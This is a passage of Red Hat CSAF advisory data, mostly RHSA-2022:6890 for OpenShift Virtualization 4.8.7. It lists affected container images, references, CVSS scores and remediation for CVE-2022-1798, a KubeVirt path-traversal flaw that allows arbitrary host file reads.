"8Base-CNV-4.9:container-native-virtualization/kubemacpool@sha256:48afb12b1adddf71f98a30960f0a06a6a8920d2fb8aa521af482eb60efd086f6_amd64", "8Base-CNV-4.9:container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:eff6902a5ae27ea85ea75a0842cb45e106285eb02456f34c377f16ad8752d8e3_amd64", "8Base-CNV-4.9:container-native-virtualization/kubevirt-ssp-operator@sha256:a6882fad978b6df2abe21bd6b67987fdcedb767487dfd980c40d465680ebb85e_amd64", "8Base-CNV-4.9:container-native-virtualization/kubevirt-template-validator@sha256:99005cdab8cd6ec64fa0b5074191f859b55519b9c24a06f764919d5dd655cda3_amd64", "8Base-CNV-4.9:container-native-virtualization/kubevirt-v2v-conversion@sha256:96126128d66f8b390c5b135e404c75bd06a9fa4c8f637dc991a2358e63393a3b_amd64", "8Base-CNV-4.9:container-native-virtualization/kubevirt-vmware@sha256:b5cfc061df65f6ee82fb792b063166be21426422093a8b99845329fd243f77ba_amd64", "8Base-CNV-4.9:container-native-virtualization/libguestfs-tools@sha256:51f80ce494533681efe96d9c7ef0f3aca2cf3c4a919469eab6aef6c1d74a8c44_amd64", "8Base-CNV-4.9:container-native-virtualization/node-maintenance-operator@sha256:ec2319366b7125b96f99a6bc2b55e4f288aabb1f7474ced9a5bac092677b1bcc_amd64", "8Base-CNV-4.9:container-native-virtualization/ovs-cni-marker@sha256:c119b9d4be1b885ab6cd1da5a9cddc862549060f9321a3d9f1f4daa0b7ff24ff_amd64", "8Base-CNV-4.9:container-native-virtualization/ovs-cni-plugin@sha256:b93deb2d624cb2289e3b558fa07b91c26bf674559243faa82f0f69e83347fcad_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-cdi-apiserver@sha256:ee809f60e35767b1755955761e16ffeaff6025d07ed73fc9ea6b66cf064177f6_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-cdi-cloner@sha256:a25b6cd4be57511338a414e1a5247745e1a7b3beb528945c9389eec473d57a19_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-cdi-controller@sha256:4a6d2ca39c487e317c6a88f3ab30ad94b56ec996da82f0ca85b202334df46770_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-cdi-importer@sha256:b842957a75980e747916d3d83651c5bbb45b3d6bc81e28c2455cd783f7e768aa_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-cdi-operator@sha256:77fe54aacce1789c4619b645ea5a9f9cc353f2e18db438aa785cd60065852071_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-cdi-uploadproxy@sha256:def07c859fccb197606115700a6da314c786ece914ed4907dafe54ba94427e8a_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-cdi-uploadserver@sha256:a2458bf4fabb6950f22c61f8fd3f34222d9fdbbd5cedf3c7852dcb87a145df7f_amd64", "8Base-CNV-4.9:container-native-virtualization/virtio-win@sha256:d61b757b9fa3e2fe3f3fc545912bdb21209f331027f363c4a0a4f57b880363e3_amd64", "8Base-CNV-4.9:container-native-virtualization/vm-import-controller-rhel8@sha256:b8e15d5243e5f89877dbd320df3515163c288e16232b9ef1fb8719bd122ff16f_amd64", "8Base-CNV-4.9:container-native-virtualization/vm-import-operator-rhel8@sha256:d55219af6e3d6962fc59de4f6f11eed7d0205bbe36d6ba7f03c74eba0881373f_amd64", "8Base-CNV-4.9:container-native-virtualization/vm-import-virtv2v-rhel8@sha256:8276c4ea2a2f487ce7dfb8469061efd4a9834fde8e9a58e4b43781c09d49d87c_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-1798", }, { category: "external", summary: "RHBZ#2117872", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2117872", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-1798", url: "https://www.cve.org/CVERecord?id=CVE-2022-1798", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-1798", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-1798", }, { category: "external", summary: "https://github.com/google/security-research/security/advisories/GHSA-cvx8-ppmc-78hm", url: "https://github.com/google/security-research/security/advisories/GHSA-cvx8-ppmc-78hm", }, ], release_date: "2022-08-08T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2022-09-22T08:16:30+00:00", details: "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.9:container-native-virtualization/virt-api@sha256:0252b6f9b2052977775cfebedf4e16cddf4484e00969180ac14da9de7b1af6e1_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-artifacts-server@sha256:446462f4f1500f8ea8837721e26c8b8bbd36aea5eed6c09546f15ad314fd0f1e_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-controller@sha256:18fc5a4b5fe3d5d0a144ca4d9f51ac9c445025ab4d2d0a3f0a4996f5ac58d725_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-handler@sha256:348d1c698ad05dc4d39548b4b79fa9643e15c507acfffdd41772830dac9c0e4c_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-launcher@sha256:182d9a84f3aa15aedd1305b025997b115baf535b1334d5fabc2f7d34ca53613d_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-operator@sha256:98e85fbcb207fada1ead3da157aba01ffbd7ed4773701e7e113c1d21849e8570_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2022:6681", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 7.7, baseSeverity: "HIGH", confidentialityImpact: "HIGH", integrityImpact: "NONE", privilegesRequired: "LOW", scope: "CHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", version: "3.1", }, products: [ "8Base-CNV-4.9:container-native-virtualization/bridge-marker@sha256:e1d3caa39c5392fe57f7e4308c9957248559457e61daf87a0e66d998e658dc97_amd64", "8Base-CNV-4.9:container-native-virtualization/cluster-network-addons-operator@sha256:9e07f1ab0e89ed31a4bc7546664fa8ea6ed5a5c78f5e71205892fd64c83d3727_amd64", "8Base-CNV-4.9:container-native-virtualization/cnv-containernetworking-plugins@sha256:64a1b3efe2bf641c746050d65e7e4bd812111537c05710a45029b25f069160d3_amd64", "8Base-CNV-4.9:container-native-virtualization/cnv-must-gather-rhel8@sha256:2d9ad446a2c7a26520b2a280580d39d02d96160d58b769c8832f31ebb9c9b51f_amd64", "8Base-CNV-4.9:container-native-virtualization/hco-bundle-registry@sha256:923fa16632843dd65fa4b4312c737eaf999ae44fb9b8c72016c8c65ce531385b_amd64", "8Base-CNV-4.9:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:5e348c3ca2ec93f22cdf246c3b9293fbba1ac2ef4b8a286c516971e4741a23bc_amd64", "8Base-CNV-4.9:container-native-virtualization/hostpath-provisioner-rhel8@sha256:efe2190ed6477fa289187de61064054290a984601a40bc7a7aaa714ceef41e90_amd64", "8Base-CNV-4.9:container-native-virtualization/hyperconverged-cluster-operator@sha256:2fd2bc99e04dde37b46a438ba881a81e0c558dcbd19681a1b927e0647dced419_amd64", "8Base-CNV-4.9:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:56dec5123de6a1e09813a39e22294eb1b1ed4c00a11c0c2719b20cf944be3d3a_amd64", "8Base-CNV-4.9:container-native-virtualization/kubemacpool@sha256:48afb12b1adddf71f98a30960f0a06a6a8920d2fb8aa521af482eb60efd086f6_amd64", "8Base-CNV-4.9:container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:eff6902a5ae27ea85ea75a0842cb45e106285eb02456f34c377f16ad8752d8e3_amd64", "8Base-CNV-4.9:container-native-virtualization/kubevirt-ssp-operator@sha256:a6882fad978b6df2abe21bd6b67987fdcedb767487dfd980c40d465680ebb85e_amd64", "8Base-CNV-4.9:container-native-virtualization/kubevirt-template-validator@sha256:99005cdab8cd6ec64fa0b5074191f859b55519b9c24a06f764919d5dd655cda3_amd64", "8Base-CNV-4.9:container-native-virtualization/kubevirt-v2v-conversion@sha256:96126128d66f8b390c5b135e404c75bd06a9fa4c8f637dc991a2358e63393a3b_amd64", "8Base-CNV-4.9:container-native-virtualization/kubevirt-vmware@sha256:b5cfc061df65f6ee82fb792b063166be21426422093a8b99845329fd243f77ba_amd64", "8Base-CNV-4.9:container-native-virtualization/libguestfs-tools@sha256:51f80ce494533681efe96d9c7ef0f3aca2cf3c4a919469eab6aef6c1d74a8c44_amd64", "8Base-CNV-4.9:container-native-virtualization/node-maintenance-operator@sha256:ec2319366b7125b96f99a6bc2b55e4f288aabb1f7474ced9a5bac092677b1bcc_amd64", "8Base-CNV-4.9:container-native-virtualization/ovs-cni-marker@sha256:c119b9d4be1b885ab6cd1da5a9cddc862549060f9321a3d9f1f4daa0b7ff24ff_amd64", "8Base-CNV-4.9:container-native-virtualization/ovs-cni-plugin@sha256:b93deb2d624cb2289e3b558fa07b91c26bf674559243faa82f0f69e83347fcad_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-api@sha256:0252b6f9b2052977775cfebedf4e16cddf4484e00969180ac14da9de7b1af6e1_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-artifacts-server@sha256:446462f4f1500f8ea8837721e26c8b8bbd36aea5eed6c09546f15ad314fd0f1e_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-cdi-apiserver@sha256:ee809f60e35767b1755955761e16ffeaff6025d07ed73fc9ea6b66cf064177f6_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-cdi-cloner@sha256:a25b6cd4be57511338a414e1a5247745e1a7b3beb528945c9389eec473d57a19_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-cdi-controller@sha256:4a6d2ca39c487e317c6a88f3ab30ad94b56ec996da82f0ca85b202334df46770_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-cdi-importer@sha256:b842957a75980e747916d3d83651c5bbb45b3d6bc81e28c2455cd783f7e768aa_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-cdi-operator@sha256:77fe54aacce1789c4619b645ea5a9f9cc353f2e18db438aa785cd60065852071_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-cdi-uploadproxy@sha256:def07c859fccb197606115700a6da314c786ece914ed4907dafe54ba94427e8a_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-cdi-uploadserver@sha256:a2458bf4fabb6950f22c61f8fd3f34222d9fdbbd5cedf3c7852dcb87a145df7f_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-controller@sha256:18fc5a4b5fe3d5d0a144ca4d9f51ac9c445025ab4d2d0a3f0a4996f5ac58d725_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-handler@sha256:348d1c698ad05dc4d39548b4b79fa9643e15c507acfffdd41772830dac9c0e4c_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-launcher@sha256:182d9a84f3aa15aedd1305b025997b115baf535b1334d5fabc2f7d34ca53613d_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-operator@sha256:98e85fbcb207fada1ead3da157aba01ffbd7ed4773701e7e113c1d21849e8570_amd64", "8Base-CNV-4.9:container-native-virtualization/virtio-win@sha256:d61b757b9fa3e2fe3f3fc545912bdb21209f331027f363c4a0a4f57b880363e3_amd64", "8Base-CNV-4.9:container-native-virtualization/vm-import-controller-rhel8@sha256:b8e15d5243e5f89877dbd320df3515163c288e16232b9ef1fb8719bd122ff16f_amd64", "8Base-CNV-4.9:container-native-virtualization/vm-import-operator-rhel8@sha256:d55219af6e3d6962fc59de4f6f11eed7d0205bbe36d6ba7f03c74eba0881373f_amd64", "8Base-CNV-4.9:container-native-virtualization/vm-import-virtv2v-rhel8@sha256:8276c4ea2a2f487ce7dfb8469061efd4a9834fde8e9a58e4b43781c09d49d87c_amd64", ], }, ], threats: [ { category: "impact", details: "Important", }, ], title: "kubeVirt: Arbitrary file read on the host from KubeVirt VMs", }, ], }
rhsa-2022_6890
Vulnerability from csaf_redhat
Published
2022-10-11 16:02
Modified
2024-11-22 18:27
Summary
Red Hat Security Advisory: OpenShift Virtualization 4.8.7 Images bug fixes and security update
Notes
Topic
Red Hat OpenShift Virtualization release 4.8.7 is now available with updates to packages and images that fix several bugs and add enhancements.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
This advisory contains the following OpenShift Virtualization 4.8.7 images:
RHEL-8-CNV-4.8
==============
vm-import-controller-container-v4.8.7-4
ovs-cni-marker-container-v4.8.7-6
virt-cdi-apiserver-container-v4.8.7-4
virt-cdi-uploadserver-container-v4.8.7-4
virt-cdi-uploadproxy-container-v4.8.7-4
vm-import-virtv2v-container-v4.8.7-4
hostpath-provisioner-container-v4.8.7-4
ovs-cni-plugin-container-v4.8.7-5
bridge-marker-container-v4.8.7-5
virt-cdi-controller-container-v4.8.7-4
node-maintenance-operator-container-v4.8.7-4
cluster-network-addons-operator-container-v4.8.7-5
cnv-containernetworking-plugins-container-v4.8.7-5
virt-cdi-importer-container-v4.8.7-4
vm-import-operator-container-v4.8.7-4
kubemacpool-container-v4.8.7-5
kubevirt-vmware-container-v4.8.7-4
kubevirt-v2v-conversion-container-v4.8.7-4
kubernetes-nmstate-handler-container-v4.8.7-5
virtio-win-container-v4.8.7-4
kubevirt-ssp-operator-container-v4.8.7-3
virt-cdi-operator-container-v4.8.7-4
cnv-must-gather-container-v4.8.7-4
hyperconverged-cluster-operator-container-v4.8.7-4
virt-cdi-cloner-container-v4.8.7-4
hostpath-provisioner-operator-container-v4.8.7-4
hyperconverged-cluster-webhook-container-v4.8.7-4
kubevirt-template-validator-container-v4.8.7-4
virt-handler-container-v4.8.7-5
virt-api-container-v4.8.7-5
virt-operator-container-v4.8.7-5
virt-launcher-container-v4.8.7-5
virt-controller-container-v4.8.7-5
hco-bundle-registry-container-v4.8.7-28
Security Fix(es):
* kubeVirt: Arbitrary file read on the host from KubeVirt VMs (CVE-2022-1798)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{ document: { aggregate_severity: { namespace: "https://access.redhat.com/security/updates/classification/", text: "Important", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright © Red Hat, Inc. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "Red Hat OpenShift Virtualization release 4.8.7 is now available with updates to packages and images that fix several bugs and add enhancements.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", title: "Topic", }, { category: "general", text: "This advisory contains the following OpenShift Virtualization 4.8.7 images:\n\nRHEL-8-CNV-4.8\n\n==============\n\nvm-import-controller-container-v4.8.7-4\novs-cni-marker-container-v4.8.7-6\nvirt-cdi-apiserver-container-v4.8.7-4\nvirt-cdi-uploadserver-container-v4.8.7-4\nvirt-cdi-uploadproxy-container-v4.8.7-4\nvm-import-virtv2v-container-v4.8.7-4\nhostpath-provisioner-container-v4.8.7-4\novs-cni-plugin-container-v4.8.7-5\nbridge-marker-container-v4.8.7-5\nvirt-cdi-controller-container-v4.8.7-4\nnode-maintenance-operator-container-v4.8.7-4\ncluster-network-addons-operator-container-v4.8.7-5\ncnv-containernetworking-plugins-container-v4.8.7-5\nvirt-cdi-importer-container-v4.8.7-4\nvm-import-operator-container-v4.8.7-4\nkubemacpool-container-v4.8.7-5\nkubevirt-vmware-container-v4.8.7-4\nkubevirt-v2v-conversion-container-v4.8.7-4\nkubernetes-nmstate-handler-container-v4.8.7-5\nvirtio-win-container-v4.8.7-4\nkubevirt-ssp-operator-container-v4.8.7-3\nvirt-cdi-operator-container-v4.8.7-4\ncnv-must-gather-container-v4.8.7-4\nhyperconverged-cluster-operator-container-v4.8.7-4\nvirt-cdi-cloner-container-v4.8.7-4\nhostpath-provisioner-operator-container-v4.8.7-4\nhyperconverged-cluster-webhook-container-v4.8.7-4\nkubevirt-template-validator-container-v4.8.7-4\nvirt-handler-container-v4.8.7-5\nvirt-api-container-v4.8.7-5\nvirt-operator-container-v4.8.7-5\nvirt-launcher-container-v4.8.7-5\nvirt-controller-container-v4.8.7-5\nhco-bundle-registry-container-v4.8.7-28\n\nSecurity Fix(es):\n\n* kubeVirt: Arbitrary file read on the host from KubeVirt VMs (CVE-2022-1798)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", title: "Details", }, { category: "legal_disclaimer", text: "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", title: "Terms of Use", }, ], publisher: { category: "vendor", contact_details: "https://access.redhat.com/security/team/contact/", issuing_authority: "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", name: "Red Hat Product Security", namespace: "https://www.redhat.com", }, references: [ { category: "self", summary: "https://access.redhat.com/errata/RHSA-2022:6890", url: "https://access.redhat.com/errata/RHSA-2022:6890", }, { category: "external", summary: "https://access.redhat.com/security/updates/classification/#important", url: "https://access.redhat.com/security/updates/classification/#important", }, { category: "external", summary: "2117872", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2117872", }, { category: "self", summary: "Canonical URL", url: "https://security.access.redhat.com/data/csaf/v2/advisories/2022/rhsa-2022_6890.json", }, ], title: "Red Hat Security Advisory: OpenShift Virtualization 4.8.7 Images bug fixes and security update", tracking: { current_release_date: "2024-11-22T18:27:58+00:00", generator: { date: "2024-11-22T18:27:58+00:00", engine: { name: "Red Hat SDEngine", version: "4.2.1", }, }, id: "RHSA-2022:6890", initial_release_date: "2022-10-11T16:02:33+00:00", revision_history: [ { date: "2022-10-11T16:02:33+00:00", number: "1", summary: "Initial version", }, { date: "2022-10-11T16:02:33+00:00", number: "2", summary: "Last updated version", }, { date: "2024-11-22T18:27:58+00:00", number: "3", summary: "Last generated version", }, ], status: "final", version: "3", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_name", name: "CNV 4.8 for RHEL 8", product: { name: "CNV 4.8 for RHEL 8", product_id: "8Base-CNV-4.8", product_identification_helper: { cpe: "cpe:/a:redhat:container_native_virtualization:4.8::el8", }, }, }, ], category: "product_family", name: "OpenShift Virtualization", }, { branches: [ { category: "product_version", name: "container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:341fef556b6a09836c040d59cf7eb87136873539e43e2cd8b3a9b023b2efca1f_amd64", product: { name: "container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:341fef556b6a09836c040d59cf7eb87136873539e43e2cd8b3a9b023b2efca1f_amd64", product_id: "container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:341fef556b6a09836c040d59cf7eb87136873539e43e2cd8b3a9b023b2efca1f_amd64", product_identification_helper: { purl: "pkg:oci/kubernetes-nmstate-handler-rhel8@sha256:341fef556b6a09836c040d59cf7eb87136873539e43e2cd8b3a9b023b2efca1f?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubernetes-nmstate-handler-rhel8&tag=v4.8.7-5", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-v2v-conversion@sha256:2f9ab9762a6457eba059aa0c805ae29d4258ba844d28ddb4c655d7b5e1528d9a_amd64", product: { name: "container-native-virtualization/kubevirt-v2v-conversion@sha256:2f9ab9762a6457eba059aa0c805ae29d4258ba844d28ddb4c655d7b5e1528d9a_amd64", product_id: "container-native-virtualization/kubevirt-v2v-conversion@sha256:2f9ab9762a6457eba059aa0c805ae29d4258ba844d28ddb4c655d7b5e1528d9a_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-v2v-conversion@sha256:2f9ab9762a6457eba059aa0c805ae29d4258ba844d28ddb4c655d7b5e1528d9a?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-v2v-conversion&tag=v4.8.7-4", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-vmware@sha256:177d52a39f5c282d2688423e7ef7393cc43f8d0451ac2a09f022fcc1658be45b_amd64", product: { name: "container-native-virtualization/kubevirt-vmware@sha256:177d52a39f5c282d2688423e7ef7393cc43f8d0451ac2a09f022fcc1658be45b_amd64", product_id: "container-native-virtualization/kubevirt-vmware@sha256:177d52a39f5c282d2688423e7ef7393cc43f8d0451ac2a09f022fcc1658be45b_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-vmware@sha256:177d52a39f5c282d2688423e7ef7393cc43f8d0451ac2a09f022fcc1658be45b?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-vmware&tag=v4.8.7-4", }, }, }, { category: "product_version", name: "container-native-virtualization/node-maintenance-operator@sha256:0e224f1dbedc32d662b2f105ccdba995f9ba84ad5b98ddb1ae178f550e47c9d2_amd64", product: { name: "container-native-virtualization/node-maintenance-operator@sha256:0e224f1dbedc32d662b2f105ccdba995f9ba84ad5b98ddb1ae178f550e47c9d2_amd64", product_id: "container-native-virtualization/node-maintenance-operator@sha256:0e224f1dbedc32d662b2f105ccdba995f9ba84ad5b98ddb1ae178f550e47c9d2_amd64", product_identification_helper: { purl: "pkg:oci/node-maintenance-operator@sha256:0e224f1dbedc32d662b2f105ccdba995f9ba84ad5b98ddb1ae178f550e47c9d2?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/node-maintenance-operator&tag=v4.8.7-4", }, }, }, { category: "product_version", name: "container-native-virtualization/vm-import-controller-rhel8@sha256:2fbbc90d89007801f8d352e0799eafb5dc9509df16555fb2cf2eea59f56b165a_amd64", product: { name: "container-native-virtualization/vm-import-controller-rhel8@sha256:2fbbc90d89007801f8d352e0799eafb5dc9509df16555fb2cf2eea59f56b165a_amd64", product_id: "container-native-virtualization/vm-import-controller-rhel8@sha256:2fbbc90d89007801f8d352e0799eafb5dc9509df16555fb2cf2eea59f56b165a_amd64", product_identification_helper: { purl: "pkg:oci/vm-import-controller-rhel8@sha256:2fbbc90d89007801f8d352e0799eafb5dc9509df16555fb2cf2eea59f56b165a?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/vm-import-controller-rhel8&tag=v4.8.7-4", }, }, }, { category: "product_version", name: "container-native-virtualization/vm-import-operator-rhel8@sha256:d64f5abb3930d56c0409593d7eccca235f53e5e000e8e5ab89c893967f36008d_amd64", product: { name: "container-native-virtualization/vm-import-operator-rhel8@sha256:d64f5abb3930d56c0409593d7eccca235f53e5e000e8e5ab89c893967f36008d_amd64", product_id: "container-native-virtualization/vm-import-operator-rhel8@sha256:d64f5abb3930d56c0409593d7eccca235f53e5e000e8e5ab89c893967f36008d_amd64", product_identification_helper: { purl: "pkg:oci/vm-import-operator-rhel8@sha256:d64f5abb3930d56c0409593d7eccca235f53e5e000e8e5ab89c893967f36008d?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/vm-import-operator-rhel8&tag=v4.8.7-4", }, }, }, { category: "product_version", name: "container-native-virtualization/vm-import-virtv2v-rhel8@sha256:4de6feb8458950539861c9e3a0c1e9d70f2f48e2657bb152a7bd6f7d541648bf_amd64", product: { name: "container-native-virtualization/vm-import-virtv2v-rhel8@sha256:4de6feb8458950539861c9e3a0c1e9d70f2f48e2657bb152a7bd6f7d541648bf_amd64", product_id: "container-native-virtualization/vm-import-virtv2v-rhel8@sha256:4de6feb8458950539861c9e3a0c1e9d70f2f48e2657bb152a7bd6f7d541648bf_amd64", product_identification_helper: { purl: "pkg:oci/vm-import-virtv2v-rhel8@sha256:4de6feb8458950539861c9e3a0c1e9d70f2f48e2657bb152a7bd6f7d541648bf?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/vm-import-virtv2v-rhel8&tag=v4.8.7-4", }, }, }, ], category: "architecture", name: "amd64", }, ], category: "vendor", name: "Red Hat", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:341fef556b6a09836c040d59cf7eb87136873539e43e2cd8b3a9b023b2efca1f_amd64 as a component of CNV 4.8 for RHEL 8", product_id: "8Base-CNV-4.8:container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:341fef556b6a09836c040d59cf7eb87136873539e43e2cd8b3a9b023b2efca1f_amd64", }, product_reference: "container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:341fef556b6a09836c040d59cf7eb87136873539e43e2cd8b3a9b023b2efca1f_amd64", relates_to_product_reference: "8Base-CNV-4.8", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-v2v-conversion@sha256:2f9ab9762a6457eba059aa0c805ae29d4258ba844d28ddb4c655d7b5e1528d9a_amd64 as a component of CNV 4.8 for RHEL 8", product_id: "8Base-CNV-4.8:container-native-virtualization/kubevirt-v2v-conversion@sha256:2f9ab9762a6457eba059aa0c805ae29d4258ba844d28ddb4c655d7b5e1528d9a_amd64", }, product_reference: "container-native-virtualization/kubevirt-v2v-conversion@sha256:2f9ab9762a6457eba059aa0c805ae29d4258ba844d28ddb4c655d7b5e1528d9a_amd64", relates_to_product_reference: "8Base-CNV-4.8", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-vmware@sha256:177d52a39f5c282d2688423e7ef7393cc43f8d0451ac2a09f022fcc1658be45b_amd64 as a component of CNV 4.8 for RHEL 8", product_id: "8Base-CNV-4.8:container-native-virtualization/kubevirt-vmware@sha256:177d52a39f5c282d2688423e7ef7393cc43f8d0451ac2a09f022fcc1658be45b_amd64", }, product_reference: "container-native-virtualization/kubevirt-vmware@sha256:177d52a39f5c282d2688423e7ef7393cc43f8d0451ac2a09f022fcc1658be45b_amd64", relates_to_product_reference: "8Base-CNV-4.8", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/node-maintenance-operator@sha256:0e224f1dbedc32d662b2f105ccdba995f9ba84ad5b98ddb1ae178f550e47c9d2_amd64 as a component of CNV 4.8 for RHEL 8", product_id: "8Base-CNV-4.8:container-native-virtualization/node-maintenance-operator@sha256:0e224f1dbedc32d662b2f105ccdba995f9ba84ad5b98ddb1ae178f550e47c9d2_amd64", }, product_reference: "container-native-virtualization/node-maintenance-operator@sha256:0e224f1dbedc32d662b2f105ccdba995f9ba84ad5b98ddb1ae178f550e47c9d2_amd64", relates_to_product_reference: "8Base-CNV-4.8", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/vm-import-controller-rhel8@sha256:2fbbc90d89007801f8d352e0799eafb5dc9509df16555fb2cf2eea59f56b165a_amd64 as a component of CNV 4.8 for RHEL 8", product_id: "8Base-CNV-4.8:container-native-virtualization/vm-import-controller-rhel8@sha256:2fbbc90d89007801f8d352e0799eafb5dc9509df16555fb2cf2eea59f56b165a_amd64", }, product_reference: "container-native-virtualization/vm-import-controller-rhel8@sha256:2fbbc90d89007801f8d352e0799eafb5dc9509df16555fb2cf2eea59f56b165a_amd64", relates_to_product_reference: "8Base-CNV-4.8", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/vm-import-operator-rhel8@sha256:d64f5abb3930d56c0409593d7eccca235f53e5e000e8e5ab89c893967f36008d_amd64 as a component of CNV 4.8 for RHEL 8", product_id: "8Base-CNV-4.8:container-native-virtualization/vm-import-operator-rhel8@sha256:d64f5abb3930d56c0409593d7eccca235f53e5e000e8e5ab89c893967f36008d_amd64", }, product_reference: "container-native-virtualization/vm-import-operator-rhel8@sha256:d64f5abb3930d56c0409593d7eccca235f53e5e000e8e5ab89c893967f36008d_amd64", relates_to_product_reference: "8Base-CNV-4.8", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/vm-import-virtv2v-rhel8@sha256:4de6feb8458950539861c9e3a0c1e9d70f2f48e2657bb152a7bd6f7d541648bf_amd64 as a component of CNV 4.8 for RHEL 8", product_id: "8Base-CNV-4.8:container-native-virtualization/vm-import-virtv2v-rhel8@sha256:4de6feb8458950539861c9e3a0c1e9d70f2f48e2657bb152a7bd6f7d541648bf_amd64", }, product_reference: "container-native-virtualization/vm-import-virtv2v-rhel8@sha256:4de6feb8458950539861c9e3a0c1e9d70f2f48e2657bb152a7bd6f7d541648bf_amd64", relates_to_product_reference: "8Base-CNV-4.8", }, ], }, vulnerabilities: [ { acknowledgments: [ { names: [ "Oliver Brooks and James Klopchic", ], organization: "NCC Group", }, ], cve: "CVE-2022-1798", cwe: { id: "CWE-22", name: "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", }, discovery_date: "2022-08-12T00:00:00+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2117872", }, ], notes: [ { category: "description", text: "An arbitrary file read vulnerability was found in the kubeVirt API. This flaw makes it possible to use the kubeVirt API to provide access to host files (like /etc/passwd, for example) in a KubeVirt VM as a disk device that can be written to and read from.", title: "Vulnerability description", }, { category: "summary", text: "kubeVirt: Arbitrary file read on the host from KubeVirt VMs", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.8:container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:341fef556b6a09836c040d59cf7eb87136873539e43e2cd8b3a9b023b2efca1f_amd64", 